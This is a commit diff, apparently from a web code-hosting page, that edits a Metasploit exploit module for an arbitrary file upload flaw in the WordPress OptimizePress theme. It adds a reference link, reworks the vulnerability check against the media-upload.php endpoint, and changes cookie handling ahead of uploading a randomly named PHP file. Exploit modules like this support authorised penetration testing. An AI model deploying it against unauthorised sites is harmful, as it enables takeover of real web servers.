Updated
parent
045b848a30
commit
57b7d89f4d
|
@ -21,6 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
|
[ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ]
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'Platform' => ['php'],
|
'Platform' => ['php'],
|
||||||
|
@ -42,10 +43,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'uri' => normalize_uri(uri, '/wp-content/themes/OptimizePress/lib/admin/media-upload.php')
|
'uri' => normalize_uri(uri, '/wp-content/themes/OptimizePress/lib/admin/media-upload.php')
|
||||||
})
|
})
|
||||||
|
|
||||||
if res and res.code == 200
|
if not res or res.code != 200
|
||||||
return Exploit::CheckCode::Vulnerable
|
|
||||||
else
|
|
||||||
return Exploit::CheckCode::Safe
|
return Exploit::CheckCode::Safe
|
||||||
|
elsif res and res.code == 200
|
||||||
|
return Exploit::CheckCode::Vulnerable
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -71,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
#set cookie
|
#set cookie
|
||||||
cookie = res.headers['Set-Cookie']
|
cookie = res.get_cookies
|
||||||
|
|
||||||
filename = rand_text_alphanumeric(8) + ".php"
|
filename = rand_text_alphanumeric(8) + ".php"
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue